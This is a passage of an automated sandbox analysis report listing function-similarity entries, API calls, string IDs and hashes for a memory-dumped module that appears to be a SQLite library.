• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: freememcmp
• String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
• API String ID: 1183899719-1341641573
• Opcode ID: 64ffc3348e5e410702e848c8edd78b134323dad80dcbaa00aa6c1ed7fa469ecb
• Instruction ID: 0d5b731b4e6e71452f02b40a28acc7cf76705435dae47c5a45c9821af7cd2139
• Opcode Fuzzy Hash: 64ffc3348e5e410702e848c8edd78b134323dad80dcbaa00aa6c1ed7fa469ecb
• Instruction Fuzzy Hash: AE12E774E04259DBDB04CF98D480A9DBBF2BF88308F25C869E855AB351D774E886CF81
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: strncmp
• String ID: -$-$0$]$false$null$true$}
• API String ID: 1114863663-1443276563
• Opcode ID: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
• Instruction ID: 7d0d7d581299a88f4ecf4101ed3cb2921062378b47abb911dec42016596cbabc
• Opcode Fuzzy Hash: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
• Instruction Fuzzy Hash: 4BD1DF70B482768ADB12CFA8C4443DABBF2AFCA318F69C25BD4919B281D739D446C751
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: memcmp
• String ID: @$access$cache
• API String ID: 1475443563-1361544076
• Opcode ID: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
• Instruction ID: bf7f6bc55254c54d21197c9aa673ce015ae0bdc4e4658c964804263f7089fac0
• Opcode Fuzzy Hash: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
• Instruction Fuzzy Hash: FDD16FB4A083558FEB11CFA4D48039EBBF1AF89318F28C45ED895AB341E339D841DB55
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                      • String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
                                                                                                                                                                                      • API String ID: 1004003707-2454903709
                                                                                                                                                                                      • Opcode ID: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
                                                                                                                                                                                      • Instruction ID: 4befd86826370bfd8630e1afa8d422750160e2b9b2ea18a9ced5634f5bcee847
                                                                                                                                                                                      • Opcode Fuzzy Hash: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B7115B49097469FC708CF58C191A59BBF0BF8A304F25C85EE8A89B751D335D882CF92
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep_amsg_exit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1015461914-0
                                                                                                                                                                                      • Opcode ID: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
                                                                                                                                                                                      • Instruction ID: a154691f748ef5392a7e4955094c5928503ae470ce452f5208c2c148eeae8840
                                                                                                                                                                                      • Opcode Fuzzy Hash: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32 ref: 61EAF889
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF89A
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 61EAF8A2
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 61EAF8AA
                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF8B9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                      • Opcode ID: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
                                                                                                                                                                                      • Instruction ID: 8be46cd1f480235cb6d0906dde7f3b0c5fd652d59fe7cf958993e94cb5683476
                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D1170B29553118FCB00DFB9E58855BBBE0FB89654F050939E544CB200EB35D9898B92
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                                                                                                      • API String ID: 1646373207-328863460
                                                                                                                                                                                      • Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
                                                                                                                                                                                      • Instruction ID: ecefe885db533eab1004145bf0edfd2de441c317d2227bbbfd891c436449bb9f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: CBE06DB4914B029BEB017FF4850633EBAF5AFC570AF72C42CD4808A290EA30C4818763
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1475443563-4108050209
                                                                                                                                                                                      • Opcode ID: 83c6ba0f8f63bb70d6e249cfeaf4de278211f53a98edee321264bd888aa8c0dc
                                                                                                                                                                                      • Instruction ID: 3f20ce3ba2961136da7f3248cde08971803f4c449cb9daae0617fd169a942f67
                                                                                                                                                                                      • Opcode Fuzzy Hash: 83c6ba0f8f63bb70d6e249cfeaf4de278211f53a98edee321264bd888aa8c0dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE112B0E04269CBDB41CFA8C99078DBBF1BF89318F258569D859AB345D734E886CF41
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: memcmp
• String ID:
• API String ID: 1475443563-0
• Opcode ID: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
• Instruction ID: fd79a925e1d847c1357e69ee8e74f21d123acc92255d85b94bee504056160bb0
• Opcode Fuzzy Hash: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
• Instruction Fuzzy Hash: C0414EB0A083058BE7049FA9D68439EBAF5EFD5358F25C83DE898CB384D775D4458B42
APIs
• strcmp.MSVCRT ref: 61EAB012
  • Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: freestrcmp
• String ID: bua$matchinfo$pcx
• API String ID: 716601943-237985100
• Opcode ID: fe89038ace25e3b1c433550f3e2f5cdd617a4f4ee623b88f6e6e715a3e2b6cf4
• Instruction ID: d7a9de28f1ba4d9dbc53b777f24a38c05efd697a91aa6da7b783da7e5ea27d52
• Opcode Fuzzy Hash: fe89038ace25e3b1c433550f3e2f5cdd617a4f4ee623b88f6e6e715a3e2b6cf4
• Instruction Fuzzy Hash: 2FE1EE74D043598FEB10CFA8C480B9DBBF1BB49318F64C46AE8A8AB351D775E985CB41
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: strncmp
• String ID: #$-$]
• API String ID: 1114863663-3149169660
• Opcode ID: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
• Instruction ID: 1c490b0b60c0b5d90f91e160a7bf365b8f8ab346ded86ed4ccdc7e106188df17
• Opcode Fuzzy Hash: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
• Instruction Fuzzy Hash: 82D15774D082698BDB01CF98C18479DFBF2BF89748FA9C059D854AB292D335E986CF50
APIs
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: __dllonexit_lock_onexit_unlock
• String ID:
• API String ID: 209411981-0
• Opcode ID: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
• Instruction ID: d8116788f2c50d2f41c70b1de34e9b41b7999a481f31fa547576aa82505b99b8
• Opcode Fuzzy Hash: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
• Instruction Fuzzy Hash: 7D1155B5A197418FCB40EF74D48455EBBE0AB89254F618D2EE4E5CB350E738D5848B82